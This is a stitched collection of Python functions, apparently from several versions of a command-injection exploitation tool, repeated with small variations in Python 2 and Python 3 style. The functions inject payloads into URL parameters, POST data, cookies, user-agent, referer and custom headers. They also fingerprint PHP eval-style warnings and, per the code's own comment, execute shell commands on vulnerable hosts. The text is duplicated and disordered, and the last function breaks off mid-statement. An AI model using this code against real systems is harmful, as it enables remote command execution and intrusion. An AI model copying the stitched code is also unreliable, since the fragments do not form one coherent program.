def injection_test(payload, http_request_method, url): # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) # Encoding spaces. payload = payload.replace(" ","%20") # Define the vulnerable parameter vuln_parameter = parameters.vuln_GET_param(url) target = re.sub(settings.INJECT_TAG, payload, url) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) try: # Get the response of the request response = requests.get_request_response(request) except KeyboardInterrupt: response = None # Check if defined method is POST. else: parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) # Define the POST data if settings.IS_JSON == False: data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) else: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) try: data = json.loads(data, strict = False) except: pass request = urllib2.Request(url, json.dumps(data)) # Check if defined extra headers. headers.do_check(request) # Define the vulnerable parameter vuln_parameter = parameters.vuln_POST_param(parameter, url) try: # Get the response of the request response = requests.get_request_response(request) except KeyboardInterrupt: response = None return response, vuln_parameter
def injection_test(payload, http_request_method, url): # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) # Encoding spaces. payload = payload.replace(" ","%20") # Define the vulnerable parameter vuln_parameter = parameters.vuln_GET_param(url) target = url.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request(target) # Check if defined extra headers. headers.do_check(request) try: # Get the response of the request response = requests.get_request_response(request) except KeyboardInterrupt: response = None # Check if defined method is POST. else: parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = ''.join(str(e) for e in parameter).replace("+","%2B") # Define the POST data if settings.IS_JSON: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except ValueError: pass elif settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request(url, data.encode(settings.UNICODE_ENCODING)) # Check if defined extra headers. headers.do_check(request) # Define the vulnerable parameter vuln_parameter = parameters.vuln_POST_param(parameter, url) try: # Get the response of the request response = requests.get_request_response(request) except KeyboardInterrupt: response = None return response, vuln_parameter
def injection_test(payload, http_request_method, url): # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) # Define the vulnerable parameter vuln_parameter = parameters.vuln_GET_param(url) target = url.replace(settings.INJECT_TAG, payload) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) # Check if defined method is POST. else: parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+", "%2B") # Define the POST data if settings.IS_JSON: data = parameter.replace( settings.INJECT_TAG, urllib.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except: pass request = urllib2.Request(url, data) else: if settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Define the vulnerable parameter vuln_parameter = parameters.vuln_POST_param(parameter, url) # Get the response of the request response = requests.get_request_response(request) return response, vuln_parameter
def injection_test(payload, http_request_method, url): # Check if defined method is GET (Default). if http_request_method == "GET": if " " in payload: payload = payload.replace(" ","%20") # Define the vulnerable parameter vuln_parameter = parameters.vuln_GET_param(url) target = url.replace(settings.INJECT_TAG, payload) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request. response = requests.get_request_response(request) # Check if defined method is POST. else: parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+","%2B") # Define the POST data if settings.IS_JSON: payload = payload.replace("\"", "\\\"") data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) try: data = json.loads(data, strict = False) except: pass request = urllib2.Request(url, json.dumps(data)) else: if settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Define the vulnerable parameter vuln_parameter = parameters.vuln_POST_param(parameter, url) # Get the response of the request. response = requests.get_request_response(request) return response, vuln_parameter
def injection_test(payload, http_request_method, url): # Check if defined HTTP method is not POST. if http_request_method != settings.HTTPMETHOD.POST: # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url, http_request_method) # Define the vulnerable parameter vuln_parameter = parameters.vuln_GET_param(url) target = url.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) # Check if defined method is POST. else: parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter, http_request_method) parameter = ''.join(str(e) for e in parameter).replace("+", "%2B") # Define the POST data if settings.IS_JSON: data = parameter.replace( settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except ValueError: pass elif settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request(url, data.encode(settings.DEFAULT_CODEC)) # Check if defined extra headers. headers.do_check(request) # Define the vulnerable parameter vuln_parameter = parameters.vuln_POST_param(parameter, url) # Get the response of the request response = requests.get_request_response(request) return response, vuln_parameter
def injection_test(payload, http_request_method, url): start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": # Encoding non-ASCII characters payload. payload = urllib.quote(payload) # Define the vulnerable parameter vuln_parameter = parameters.vuln_GET_param(url) target = url.replace(settings.INJECT_TAG, payload) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) # Check if defined method is POST. else: parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+", "%2B") # Define the vulnerable parameter vuln_parameter = parameters.vuln_POST_param(parameter, url) # Define the POST data if settings.IS_JSON: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) try: data = json.loads(data, strict=False) except: pass request = urllib2.Request(url, json.dumps(data)) else: if settings.IS_XML: data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) else: data = parameter.replace(settings.INJECT_TAG, payload) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) end = time.time() how_long = int(end - start) return how_long, vuln_parameter
def authentication_process(): auth_url = menu.options.auth_url auth_data = menu.options.auth_data cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) request = opener.open(urllib2.Request(auth_url)) cookies = "" for cookie in cj: cookie_values = cookie.name + "=" + cookie.value + "; " cookies += cookie_values if len(cookies) != 0 : menu.options.cookie = cookies.rstrip() if settings.VERBOSITY_LEVEL >= 1: success_msg = "The received cookie is " success_msg += menu.options.cookie + Style.RESET_ALL + "." print settings.print_success_msg(success_msg) urllib2.install_opener(opener) request = urllib2.Request(auth_url, auth_data) # Check if defined extra headers. headers.do_check(request) # Get the response of the request. response = requests.get_request_response(request) return response
def authentication_process(): auth_url = menu.options.auth_url auth_data = menu.options.auth_data cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) request = opener.open(urllib2.Request(auth_url)) cookies = "" for cookie in cj: cookie_values = cookie.name + "=" + cookie.value + "; " cookies += cookie_values if len(cookies) != 0: menu.options.cookie = cookies.rstrip() if settings.VERBOSITY_LEVEL >= 1: success_msg = "The received cookie is " success_msg += menu.options.cookie + Style.RESET_ALL + "." print settings.print_success_msg(success_msg) urllib2.install_opener(opener) request = urllib2.Request(auth_url, auth_data) # Check if defined extra headers. headers.do_check(request) # Get the response of the request. response = requests.get_request_response(request) return response
def heuristic_basic(url, http_request_method): test_type = "code injection" try: try: if re.findall(r"=(.*)&", url): url = url.replace("/&", "/e&") elif re.findall(r"=(.*)&", menu.options.data): menu.options.data = menu.options.data.replace("/&", "/e&") except TypeError as err_msg: pass if not settings.IDENTIFIED_WARNINGS: if settings.VERBOSITY_LEVEL >= 1: debug_msg = "Performing heuristic (" + test_type + ") test." print(settings.print_debug_msg(debug_msg)) if http_request_method == "GET": request = _urllib.request.Request(url.replace(settings.INJECT_TAG, settings.BASIC_TEST)) else: request = _urllib.request.Request(url, menu.options.data.replace(settings.INJECT_TAG, settings.BASIC_TEST)) headers.do_check(request) response = requests.get_request_response(request) html_data = response.read().decode(settings.UNICODE_ENCODING) for warning in settings.CODE_INJECTION_WARNINGS: if warning in html_data: technique = "dynamic code evaluation technique" info_msg = "Heuristic (" + test_type + ") test shows that target URL might be injectable." print(settings.print_bold_info_msg(info_msg)) settings.IDENTIFIED_WARNINGS = True break return url except _urllib.error.URLError as err_msg: print(settings.print_critical_msg(err_msg)) raise SystemExit() except _urllib.error.HTTPError as err_msg: print(settings.print_critical_msg(err_msg)) raise SystemExit()
def warning_detection(url, http_request_method): try: # Find the host part url_part = url.split("=")[0] request = urllib2.Request(url_part) # Check if defined extra headers. headers.do_check(request) response = requests.get_request_response(request) if response: response = urllib2.urlopen(request) html_data = response.read() err_msg = "" if "eval()'d code" in html_data: err_msg = "'eval()'" if "Cannot execute a blank command in" in html_data: err_msg = "execution of a blank command," if "sh: command substitution:" in html_data: err_msg = "command substitution" if "Warning: usort()" in html_data: err_msg = "'usort()'" if re.findall(r"=/(.*)/&", url): if "Warning: preg_replace():" in html_data: err_msg = "'preg_replace()'" url = url.replace("/&","/e&") if "Warning: assert():" in html_data: err_msg = "'assert()'" if "Failure evaluating code:" in html_data: err_msg = "code evaluation" if err_msg != "": warn_msg = "A failure message on " + err_msg + " was detected on page's response." print settings.print_warning_msg(warn_msg) return url except urllib2.HTTPError, err_msg: print settings.print_critical_msg(err_msg) raise SystemExit()
def injection_test(payload, http_request_method, url): start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": # Encoding non-ASCII characters payload. payload = urllib.quote(payload) # Define the vulnerable parameter vuln_parameter = parameters.vuln_GET_param(url) target = re.sub(settings.INJECT_TAG, payload, url) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) # Check if defined method is POST. else: parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+","%2B") # Define the vulnerable parameter vuln_parameter = parameters.vuln_POST_param(parameter, url) # Define the POST data if settings.IS_JSON == False: data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) else: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) try: data = json.loads(data, strict = False) except: pass request = urllib2.Request(url, json.dumps(data)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) end = time.time() how_long = int(end - start) return how_long, vuln_parameter
def heuristic_basic(url, http_request_method): injection_type = "results-based dynamic code evaluation" technique = "dynamic code evaluation technique" technique = "(" + injection_type.split(" ")[0] + ") " + technique + "" if menu.options.skip_heuristics: if settings.VERBOSITY_LEVEL != 0: debug_msg = "Skipping (basic) heuristic detection for " + technique + "." print(settings.print_debug_msg(debug_msg)) return url else: settings.EVAL_BASED_STATE = True try: try: if re.findall(r"=(.*)&", url): url = url.replace("/&", "/e&") elif re.findall(r"=(.*)&", menu.options.data): menu.options.data = menu.options.data.replace("/&", "/e&") except TypeError as err_msg: pass if not settings.IDENTIFIED_WARNINGS and not settings.IDENTIFIED_PHPINFO: if settings.VERBOSITY_LEVEL != 0: debug_msg = "Starting (basic) heuristic detection for " + technique + "." print(settings.print_debug_msg(debug_msg)) for payload in settings.PHPINFO_CHECK_PAYLOADS: payload = checks.perform_payload_modification(payload) if settings.VERBOSITY_LEVEL >= 1: print(settings.print_payload(payload)) if not menu.options.data: request = _urllib.request.Request(url.replace(settings.INJECT_TAG, payload)) else: data = menu.options.data.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request(url, data.encode(settings.UNICODE_ENCODING)) headers.do_check(request) response = requests.get_request_response(request) if type(response) is not bool: html_data = checks.page_encoding(response, action="decode") match = re.search(settings.CODE_INJECTION_PHPINFO, html_data) if match: technique = technique + " (possible PHP version: '" + match.group(1) + "')" settings.IDENTIFIED_PHPINFO = True else: for warning in settings.CODE_INJECTION_WARNINGS: if warning in html_data: settings.IDENTIFIED_WARNINGS = True break if settings.IDENTIFIED_WARNINGS or settings.IDENTIFIED_PHPINFO: info_msg = "Heuristic detection shows that target might be injectable via " + technique + "." print(settings.print_bold_info_msg(info_msg)) break settings.EVAL_BASED_STATE = False return url except (_urllib.error.URLError, _urllib.error.HTTPError) as err_msg: print(settings.print_critical_msg(err_msg)) raise SystemExit()
def injection_test(payload, http_request_method, url): start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": payload = payload.replace("#", "%23") # Encoding non-ASCII characters payload. # payload = _urllib.parse.quote(payload) # Define the vulnerable parameter vuln_parameter = parameters.vuln_GET_param(url) target = url.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request(target) # Check if defined method is POST. else: parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = ''.join(str(e) for e in parameter).replace("+", "%2B") # Define the vulnerable parameter vuln_parameter = parameters.vuln_POST_param(parameter, url) # Define the POST data if settings.IS_JSON: data = parameter.replace( settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except ValueError: pass elif settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request( url, data.encode(settings.UNICODE_ENCODING)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) end = time.time() how_long = int(end - start) return how_long, vuln_parameter
def examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response): start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": # Encoding non-ASCII characters payload. # payload = urllib.quote(payload) target = url.replace(settings.INJECT_TAG, payload) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined method is POST. else: parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+", "%2B") # Define the POST data if settings.IS_JSON: data = parameter.replace( settings.INJECT_TAG, urllib.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except: pass request = urllib2.Request(url, data) else: if settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) end = time.time() how_long = int(end - start) return how_long
def examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response): start = 0 end = 0 start = time.time() # Check if defined POST data if not settings.USER_DEFINED_POST_DATA: # Encoding non-ASCII characters payload. # payload = _urllib.parse.quote(payload) target = url.replace(settings.INJECT_TAG, payload) vuln_parameter = ''.join(vuln_parameter) request = _urllib.request.Request(target) # Check if defined method is POST. else: parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter, http_request_method) parameter = ''.join(str(e) for e in parameter).replace("+", "%2B") # Define the POST data if settings.IS_JSON: data = parameter.replace( settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except ValueError: pass elif settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request(url, data.encode(settings.DEFAULT_CODEC)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) end = time.time() how_long = int(end - start) return how_long
def examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response): start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": # Encoding non-ASCII characters payload. # payload = urllib.quote(payload) target = url.replace(settings.INJECT_TAG, payload) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined method is POST. else : parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+","%2B") # Define the POST data if settings.IS_JSON: payload = payload.replace("\"", "\\\"") data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) try: data = json.loads(data, strict = False) except: pass request = urllib2.Request(url, json.dumps(data)) else: if settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) end = time.time() how_long = int(end - start) return how_long
def examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response): start = 0 end = 0 start = time.time() # Check if defined method is GET (Default). if http_request_method == "GET": payload = urllib.quote(payload) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined method is POST. else: parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+", "%2B") if settings.IS_JSON: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) try: data = json.loads(data, strict=False) except: pass request = urllib2.Request(url, json.dumps(data)) else: if settings.IS_XML: data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) else: data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) end = time.time() how_long = int(end - start) return how_long
def heuristic_basic(url, http_request_method): technique = "dynamic code evaluation technique" try: try: if re.findall(r"=(.*)&", url): url = url.replace("/&", "/e&") elif re.findall(r"=(.*)&", menu.options.data): menu.options.data = menu.options.data.replace("/&", "/e&") except TypeError as err_msg: pass if not settings.IDENTIFIED_WARNINGS and not settings.IDENTIFIED_PHPINFO: if settings.VERBOSITY_LEVEL != 0: debug_msg = "Performing heuristic test for " + technique + "." print(settings.print_debug_msg(debug_msg)) if http_request_method == "GET": request = _urllib.request.Request( url.replace(settings.INJECT_TAG, settings.BASIC_TEST)) else: data = menu.options.data.replace(settings.INJECT_TAG, settings.BASIC_TEST) request = _urllib.request.Request( url, data.encode(settings.UNICODE_ENCODING)) headers.do_check(request) response = requests.get_request_response(request) if type(response) is not bool: html_data = checks.page_encoding(response, action="decode") match = re.search(settings.CODE_INJECTION_PHPINFO, html_data) if match: technique = technique + " (possible PHP version: '" + match.group( 1) + "')" settings.IDENTIFIED_PHPINFO = True else: for warning in settings.CODE_INJECTION_WARNINGS: if warning in html_data: settings.IDENTIFIED_WARNINGS = True break if settings.IDENTIFIED_WARNINGS or settings.IDENTIFIED_PHPINFO: info_msg = "Heuristic test shows that target might be injectable via " + technique + "." print(settings.print_bold_info_msg(info_msg)) return url except (_urllib.error.URLError, _urllib.error.HTTPError) as err_msg: print(settings.print_critical_msg(err_msg)) raise SystemExit()
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell : payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE) else: payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: payload_msg = payload.replace("\n", "\\n") if settings.COMMENT in payload_msg: payload = payload.split(settings.COMMENT)[0].strip() payload_msg = payload_msg.split(settings.COMMENT)[0].strip() info_msg = "Executing the '" + cmd.split(settings.COMMENT)[0].strip() + "' command... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() output_payload = "\n" + settings.print_payload(payload) if settings.VERBOSITY_LEVEL >= 1: output_payload = output_payload + "\n" sys.stdout.write(output_payload) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: response = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) payload = payload.replace(" ","%20") target = url.replace(settings.INJECT_TAG, payload) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else : # Check if defined method is POST. parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) # Define the POST data if settings.IS_JSON: payload = payload.replace("\"", "\\\"") data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) try: data = json.loads(data, strict = False) except: pass request = urllib2.Request(url, json.dumps(data)) else: if settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell: payload = fb_payloads.cmd_execution_alter_shell( separator, cmd, OUTPUT_TEXTFILE) else: payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: payload_msg = payload.replace("\n", "\\n") if settings.COMMENT in payload_msg: payload_msg = payload_msg.split(settings.COMMENT)[0] info_msg = "Executing the '" + cmd.split( settings.COMMENT)[0] + "' command " sys.stdout.write("\n" + settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write( "\n" + settings.print_payload(payload).split(settings.COMMENT)[0] + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) payload = payload.replace(" ", "%20") target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else: # Check if defined method is POST. parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) # Define the POST data if settings.IS_JSON == False: data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) else: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) try: data = json.loads(data, strict=False) except: pass request = urllib2.Request(url, json.dumps(data)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell : payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE) else: payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: payload_msg = payload.replace("\n", "\\n") if settings.COMMENT in payload_msg: payload = payload.split(settings.COMMENT)[0].strip() payload_msg = payload_msg.split(settings.COMMENT)[0].strip() info_msg = "Executing the '" + cmd.split(settings.COMMENT)[0].strip() + "' command... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() output_payload = "\n" + settings.print_payload(payload) if settings.VERBOSITY_LEVEL >= 1: output_payload = output_payload + "\n" sys.stdout.write(output_payload) # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: response = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) payload = payload.replace(" ","%20") target = url.replace(settings.INJECT_TAG, payload) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else : # Check if defined method is POST. parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) # Define the POST data if settings.IS_JSON: data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except: pass request = urllib2.Request(url, data) else: if settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = urllib2.Request(url, data) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell: payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd) else: payload = eb_payloads.cmd_execution(separator, TAG, cmd) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + urllib.quote(")}") in payload: payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}")) # Whitespace fixation payload = re.sub(" ", whitespace, payload) if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: info_msg = "Executing the '" + cmd + "' command: " sys.stdout.write("\n" + settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif 